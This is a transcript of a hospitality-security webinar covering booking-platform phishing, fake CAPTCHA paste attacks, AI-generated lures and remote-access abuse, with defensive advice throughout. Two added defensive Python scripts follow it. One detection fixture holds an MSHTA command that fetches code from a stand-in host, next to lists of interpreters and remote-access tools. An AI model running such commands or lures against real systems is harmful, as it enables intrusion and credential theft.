Webinar: Hospitality in Security: Exposing the common vulnerabilities

Speakers:

Adam Blake, CEO, ThreatSpike
Curt Hems, Offensive Security, ThreatSpike

Webinar Details:

Recorded Date: April 2025

Summary:

This webinar explores the growing cyber and physical security risks facing the hospitality industry. Drawing on real investigations from ThreatSpike, the session highlights how attackers are targeting hotels through phishing campaigns, compromised booking workflows and new AI-driven social engineering techniques. It also examines how the open and service-focused nature of hospitality creates a large attack surface across systems, staff and guest interactions.


The session also shares findings from physical penetration testing in hotels, showing how attackers combine social engineering, weak operational controls and physical access to compromise systems and sensitive data. The aim is to provide practical insight into how these attacks happen and what hotels can do to strengthen their security posture.


Key Takeaways:

• New phishing and social engineering techniques targeting hotel staff
• Lessons from attacks involving platforms such as Booking.com and Revinate
• Common physical security weaknesses discovered during hotel penetration tests
• Practical steps hotels can take to reduce cyber and operational risk

Hello and welcome to our hospitality security webinar. This is the very first webinar that we’ve been doing this year. We’ve started a new series because we want to deliver actionable intelligence to our hospitality customers and others within the industry. What we are seeing is that hospitality is one of the most targeted industries today.

Many people assume most attacks focus on critical national infrastructure. While that certainly happens, we actually see hospitality as one of the highest targeted industries and often one of the first targeted as well.

What we wanted to do today is walk through some of the things we have been seeing in quarter one of this year so you have the information you need to protect your companies.

Over this session I will step through some of the threats we have been seeing. Then in the second part of today’s webinar we are very lucky to have one of our team members, Curt, who will walk you through some of the physical security testing we have been carrying out within hospitality and show some of the interesting findings we have uncovered.

So let’s kick off.

A very quick introduction for those who do not know us. ThreatSpike is a company that I co-founded and we have grown extensively over the last few years across the globe. We now cover a very large number of industries. We see a lot of active security threats and we are able to spot patterns of activity emerging, identifying where something first starts and how it evolves over time.

Having a global customer base has helped us understand the cultural differences between regions and the different approaches organisations take towards cyber security.

With that said, I will take you through some of the things we have seen this quarter.

Some of the things we have observed have appeared in previous years. For example we will talk about Booking.com phishing attacks which have been happening for the last couple of years. However we have also seen some interesting developments that we have not seen before in all the time we have been monitoring these threats.

One of the key things that happened at the beginning of this year involved Revinate. Revinate, as most of you will know, is one of the largest direct booking platform vendors in the hospitality industry.

What happened was similar to the Booking.com attacks. A series of phishing emails were sent out to Revinate customers pretending to come from Revinate itself.

In some cases the emails appeared to come from Revinate’s own email address, hoping that email protection systems would fail and allow them through without properly checking SPF or DKIM records. In other cases the emails came from completely different email addresses, hoping the recipient would not closely check the sender.

In all cases the emails directed the user to log into their Revinate account to deal with a supposed issue, usually threatening that the service was about to be disrupted or cancelled.

When users clicked the link they landed on a phishing page, very similar to the Booking.com phishing attacks. This page captured their username and password.

Attackers then used those credentials to log into the Revinate CRM platform as that customer. Once inside they accessed various areas of the system such as guest information. Revinate does not provide much native export functionality, so the attackers manually stepped through page after page of guest data, taking screenshots or saving the pages locally as HTML.

They effectively captured sensitive guest information, although interestingly they did not use that information immediately.

Earlier this year, in January, guests suddenly started receiving phishing emails asking them to make payments related to their bookings. In some cases it was presented as an additional payment before arrival, or a secondary payment after the original booking.

Guests began receiving these messages and some recognised that something was not right and reported it to the hotels. What was particularly interesting was that the attackers had stored the stolen information for months before using it.

When investigating this further, Revinate’s response in January was that the breach had actually occurred months earlier, around August to November 2024. At that time Revinate did not enforce multi-factor authentication on accounts.

Because there was no MFA requirement, a simple username and password phishing attack was enough to capture credentials and access the platform.

Unfortunately by the time this came to light a significant amount of time had passed. Despite Revinate being a compliant organisation, they only retained thirty days of access logs. That meant it was impossible to determine which accounts had been compromised, when they were compromised, or what activity had taken place.

This created a serious data privacy issue because there was no way to perform proper triage or root cause analysis. Customers had to rely on Revinate’s explanation that their systems were not compromised directly, but there was little evidence available to prove that either way.

There are a few key lessons from this.

Firstly, organisations should integrate these types of web applications, such as Booking.com and Revinate, into single sign-on systems wherever possible. Unfortunately vendors do not always provide that capability, so increased pressure on them to support these integrations would significantly reduce risk.

Secondly, wherever multi-factor authentication is available it should always be used. Revinate did offer MFA but many users had not enabled it.

Finally, where possible organisations should capture audit logs from these platforms and pull them into their own SIEM or log management systems. That allows suspicious login activity to be detected just as it would with platforms like Microsoft 365 or Azure.

Moving on to the next threat we have seen this year, something that again appeared in hospitality before spreading into other industries, is fake CAPTCHA attacks.

In this scenario attackers create a website pretending to be the Booking.com partner hub. However the URL clearly shows that it is not Booking.com.

Users receive links similar to earlier phishing attacks, but instead of asking for usernames and passwords they are asked to prove they are not a robot. The instructions tell the user to press the Windows key and R, paste a command and press enter.

What actually happens is that the web page copies a malicious script onto the user’s clipboard using JavaScript. The user then pastes it into the Windows run dialogue and executes it.

The command uses MSHTA, which is a Windows script interpreter, to download and execute malicious code from the internet. It even includes a small phrase such as “I am not a robot” to make the command look legitimate.

We are seeing this technique spread quickly and it has been very effective at convincing users to execute malicious commands.

To defend against this type of attack organisations should block unnecessary script interpreters such as MSHTA and PowerShell where possible. They should also consider disabling the Windows run dialogue for standard users and ensure that endpoint detection and response tools are deployed to detect and block these activities.

Another interesting development we have seen this year is fully AI generated phishing emails.

Last year we started seeing partially AI generated messages. Now we are seeing entire phishing campaigns generated using AI.

Hotels receive emails that appear to come from guests complaining about a poor stay, bad food or a negative review. Within the email is a link which supposedly points to the review. In reality it leads to a phishing site.

The level of detail in these emails is impressive, but analysis using tools such as ZeroGPT shows that the entire message is generated by AI.

This allows attackers to produce highly varied phishing emails that bypass traditional mail filtering rules. There may be no suspicious branding or obvious malicious indicators. It simply appears to be a guest complaint.

Booking.com phishing attacks continue to evolve as well. Attackers constantly experiment with different formats to bypass email security systems.

Some emails claim that a guest has left a complaint and ask the recipient to click a link for details. Others contain almost no information but include a PDF attachment that contains a copy of the message with a phishing link.

Another particularly interesting case involved hotels receiving fraudulent messages through the Booking.com platform itself.

Even after securing their Booking.com accounts and enabling multi-factor authentication, guests were still receiving phishing messages that appeared to come through the legitimate Booking.com messaging system.

After investigation it turned out the Booking.com accounts themselves had not been compromised. Instead the organisation had an internally developed CRM system storing guest details.

Every Booking.com guest has a unique email address that forwards messages into the Booking.com messaging platform. Attackers gained access to the internal CRM and harvested these email addresses. They then sent phishing messages directly to those addresses, which appeared inside the Booking.com app as legitimate messages.

Since they did not have access to the Booking.com account itself they could not include clickable links, so they split the links into multiple parts and asked guests to reconstruct them manually.

We have also seen attackers buying advertisements on search engines to target guests before they reach legitimate hotel websites.

A guest searches for a hotel and sees an advert above the genuine website. The advert leads to a fake booking page where prices are inflated or payment details are stolen.

In the future this technique could easily be used for phishing pages or malware downloads. Attackers are willing to pay for advertising to place malicious links above legitimate websites.

Organisations should regularly check search engine results for their hotel names to ensure no fraudulent adverts are appearing. There are also reputation protection services that monitor this automatically and raise alerts if suspicious activity is detected.

Another attack we have seen involves phishing emails containing encoded URLs. These emails ask the user to copy and paste a link into their browser rather than clicking it.

The link uses URL encoding so email security tools do not recognise it as a valid URL. When pasted into a browser it automatically decodes and redirects the user to a malicious site hosted on legitimate services such as Google Looker Studio or OneDrive. These platforms are often used as staging points before redirecting users to phishing pages.

Finally there has been a significant increase in what are known as “living off the land” attacks.

Instead of installing malware, attackers persuade staff to install legitimate remote access tools such as TeamViewer or AnyDesk. Once installed the attacker can reconnect to that machine whenever they want and access everything the user can see.

In some cases attackers then extract stored browser credentials. If passwords are saved in the browser they can capture them using developer tools or session cookies. Even multi-factor authentication does not always protect against session hijacking if cookies are stolen.

The key defences here include blocking remote access tools where they are not required, monitoring application logs for suspicious behaviour, and preventing users from storing passwords in browsers.

Rather than taking questions now I am going to hand over to Curt, who will walk you through some of the physical penetration testing we carry out for hospitality customers and some of the common findings we encounter.
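The fake CAPTCHA and "living off the land" sections above describe what a defender should look for on the endpoint: a script interpreter such as MSHTA launched from the Run dialog with a URL on its command line, and remote access tools appearing where they are not sanctioned. The following is an added example, not ThreatSpike's tooling, that runs those two detection rules over constructed process-creation log lines; the log format, user names and URL are invented for the example.

```python
"""Constructed example (not ThreatSpike code): flag process-creation events that
match the fake-CAPTCHA (Win+R paste) pattern or unsanctioned remote access tools."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Script interpreters a standard user should rarely launch interactively
INTERPRETERS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe"}
# Legitimate remote access tools that attackers talk staff into installing
REMOTE_TOOLS = {"teamviewer.exe", "anydesk.exe"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


@dataclass
class ProcessEvent:
    user: str
    parent: str   # parent image name, lower-cased (explorer.exe = launched from the shell / Run dialog)
    image: str    # process image name, lower-cased
    cmdline: str


def parse_event(line: str) -> ProcessEvent:
    """Parse one constructed key="value" process-creation log line."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcessEvent(fields["user"], fields["parent"].lower(),
                        fields["image"].lower(), fields["cmdline"])


def classify(ev: ProcessEvent) -> Optional[str]:
    """Return an alert name, or None when the event looks benign."""
    # Run-dialog paste: explorer.exe spawns an interpreter with a URL on the command line
    if ev.parent == "explorer.exe" and ev.image in INTERPRETERS and URL_RE.search(ev.cmdline):
        return "clickfix_interpreter_with_url"
    if ev.image in REMOTE_TOOLS:
        return "unsanctioned_remote_access_tool"
    return None


# Constructed sample log: one ClickFix-style launch, one AnyDesk start, two benign events
SAMPLE_LOG = """\
user="reception1" parent="explorer.exe" image="mshta.exe" cmdline="mshta http://staging.invalid/x # I am not a robot - reCAPTCHA Verification"
user="reception1" parent="explorer.exe" image="notepad.exe" cmdline="notepad shift.txt"
user="frontdesk2" parent="explorer.exe" image="AnyDesk.exe" cmdline="AnyDesk.exe"
user="svc_build" parent="cmd.exe" image="powershell.exe" cmdline="powershell -File build.ps1"
"""


def scan(log_text: str) -> List[Tuple[str, str]]:
    """Return (user, alert) pairs for every suspicious event in the log."""
    alerts = []
    for line in log_text.splitlines():
        ev = parse_event(line)
        alert = classify(ev)
        if alert:
            alerts.append((ev.user, alert))
    return alerts


if __name__ == "__main__":
    for user, alert in scan(SAMPLE_LOG):
        print(f"{alert}: {user}")
```

The PowerShell launched from cmd.exe by a service account is deliberately left unflagged: the rule keys on the explorer.exe parent that a Run-dialog paste produces, which is where the blocking and alerting the webinar recommends should be focused.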
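The encoded-URL phishing described above works because a mail filter sees a run of percent-escapes rather than an http link, while the browser decodes it on paste. As an added example (not ThreatSpike's code), this recovers such links from an email body, undoing nested encoding, and flags hosts used as staging points; the email text and the staging host list are constructed for the example.

```python
"""Constructed example (not ThreatSpike code): recover percent-encoded links from an
email body and flag those that land on known redirect/staging services."""
import re
from typing import Dict, List
from urllib.parse import unquote, urlparse

# Legitimate services the webinar names as staging points before the phishing page
STAGING_HOSTS = {"lookerstudio.google.com", "onedrive.live.com"}
# Any whitespace-delimited token that contains at least one %XX escape
TOKEN_RE = re.compile(r"\S*%[0-9A-Fa-f]{2}\S*")


def fully_decode(token: str, max_rounds: int = 5) -> str:
    """Undo nested percent-encoding: the browser decodes one layer, a redirector may decode another."""
    for _ in range(max_rounds):
        decoded = unquote(token)
        if decoded == token:
            break
        token = decoded
    return token


def hidden_urls(body: str) -> List[Dict[str, object]]:
    """Return every encoded token that decodes to an http(s) URL, with its host and a staging flag."""
    found = []
    for token in TOKEN_RE.findall(body):
        decoded = fully_decode(token.rstrip(".,;:)"))
        parsed = urlparse(decoded)
        if parsed.scheme in ("http", "https") and parsed.hostname:
            found.append({"raw": token, "url": decoded, "host": parsed.hostname,
                          "staging_host": parsed.hostname in STAGING_HOSTS})
    return found


# Constructed phishing body: one single-encoded link, one double-encoded link, one decoy ("20%25")
SAMPLE_BODY = """\
Dear Reception, a guest has left a complaint about their stay.
Copy and paste this into your browser to read it:
%68%74%74%70%73%3A%2F%2Flookerstudio.google.com%2Freporting%2Fabc123
Alternatively use https%253A%252F%252Fonedrive.live.com%252Fredir%253Fx%253D1
Reply within 24h or a 20%25 service charge applies.
"""

if __name__ == "__main__":
    for hit in hidden_urls(SAMPLE_BODY):
        print(f"{hit['host']} staging={hit['staging_host']} <- {hit['raw']}")
```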